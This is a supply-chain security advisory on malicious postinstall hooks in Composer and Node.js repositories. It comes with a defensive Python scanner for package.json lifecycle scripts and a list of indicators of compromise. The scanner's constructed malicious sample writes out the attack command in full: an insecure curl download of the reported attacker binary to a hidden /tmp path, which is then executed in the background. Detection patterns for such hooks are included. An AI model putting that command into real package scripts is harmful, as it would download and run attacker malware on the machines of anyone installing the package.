Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects
Malicious postinstall hooks discovered across 700+ GitHub repos targeting PHP and Node.js packages via Packagist.
Summary
Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages on Packagist, where the upstream repositories were modified to include malicious postinstall scripts in their package.json files. The scripts attempted to download a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL with TLS certificate verification disabled, save it to /tmp/.sshd, and execute it in the background. A broader GitHub search revealed hundreds of additional references to the same attacker infrastructure across Node.js repositories, suggesting the campaign extends far beyond the confirmed Packagist findings.
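As an added illustration (not code from Socket's write-up or from any affected project), a heuristic scanner in Python that parses a package.json and flags lifecycle hooks exhibiting the behaviours described above: the reported download URL, a downloader run with TLS verification disabled, a hidden path under /tmp, a chmod that makes the file executable, and backgrounded execution. The two sample package.json documents are constructed; the rule names and the function name are assumptions of this example.

```python
"""Heuristic scanner for malicious npm lifecycle hooks in package.json files."""
import json
import re

# Scripts npm runs automatically during `npm install`; the campaign abused postinstall.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Attacker-controlled download URL reported in the Socket write-up.
KNOWN_IOC_URLS = {
    "https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f"
    "/releases/latest/download/gvfsd-network",
}

# One rule per behaviour described in the summary. These are heuristics, so
# expect some noise on legitimate build steps that fetch toolchains.
RULES = [
    ("tls-verification-disabled",
     re.compile(r"\bcurl\b[^|;&]*(?:\s-k(?=\s|$)|\s--insecure\b)|\bwget\b[^|;&]*--no-check-certificate")),
    ("downloader-in-hook", re.compile(r"\b(?:curl|wget)\b")),
    ("hidden-tmp-path", re.compile(r"/tmp/\.[A-Za-z0-9_]")),
    ("background-execution", re.compile(r"&\s*$|\bnohup\b|\bsetsid\b")),
    ("chmod-executable", re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")),
]


def scan_package_json(text):
    """Return (hook, finding) pairs for suspicious lifecycle scripts in one package.json."""
    findings = []
    scripts = json.loads(text).get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        if any(url in cmd for url in KNOWN_IOC_URLS):
            findings.append((hook, "known-ioc-url"))
        findings.extend((hook, name) for name, pat in RULES if pat.search(cmd))
    return findings


# Constructed samples (not taken from a real repository): the first mirrors the
# behaviour described in the summary, the second is an ordinary build step.
MALICIOUS_SAMPLE = json.dumps({"name": "example-pkg", "scripts": {
    "postinstall": "curl -k -sL " + next(iter(KNOWN_IOC_URLS))
                   + " -o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd &",
    "test": "phpunit"}})
BENIGN_SAMPLE = json.dumps({"name": "clean-pkg", "scripts": {
    "postinstall": "node scripts/build.js", "test": "jest"}})

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_package_json(sample))
```

Run it over every package.json in a checkout (including vendored dependencies) and treat any hit on known-ioc-url or tls-verification-disabled as a blocking finding; the remaining rules are best reviewed together rather than individually.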
Indicators of Compromise
- url — https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network
- malware — gvfsd-network